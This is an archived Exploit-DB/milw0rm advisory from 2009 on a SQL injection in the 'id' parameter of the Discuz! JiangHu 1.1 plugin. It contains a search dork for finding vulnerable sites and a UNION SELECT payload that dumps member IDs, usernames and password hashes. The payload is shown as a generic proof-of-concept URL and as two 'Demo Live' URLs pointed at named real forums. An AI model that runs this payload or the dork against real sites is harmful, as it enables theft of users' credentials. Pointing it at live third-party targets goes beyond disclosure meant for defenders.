Discuz! Plugin JiangHu 1.1 - 'id' SQL Injection

EDB-ID:

9576


Author:

ZhaoHuAn

Type:

webapps


Platform:

PHP

Date:

2009-09-02


=========================================================
Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability
=========================================================

========================[Author]=========================                   

 [+] Founded 	: ZhaoHuAn				     
 [+] Contact	: ZhengXing[at]shandagames[dot]com	         
 [+] Blog	: http://www.patching.net/zhaohuan/	         
 [+] Date	: Feb, 9th 2009	 
 [+] Update	: Sep, 1th 2009	
								 
========================[Soft Info]======================		 
								 
Software: Discuz! Plugin JiangHu Inn		         
Version	: 1.1					                 
Vendor	: http://www.discuz.com
d0rk    : inurl:forummission.php			             	 



[-] Exploit:
[+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] SqlI PoC:
[+] http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[+] Demo Live:
[-] http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--


/---------------------------------------------www.zhaohuan.net-------------------------------------------------\  

                                            Greetz : Snda Security Team
                                                    & Normal is boring - -!

\--------------------------------------------------------------------------------------------------------------/

# milw0rm.com [2009-09-02]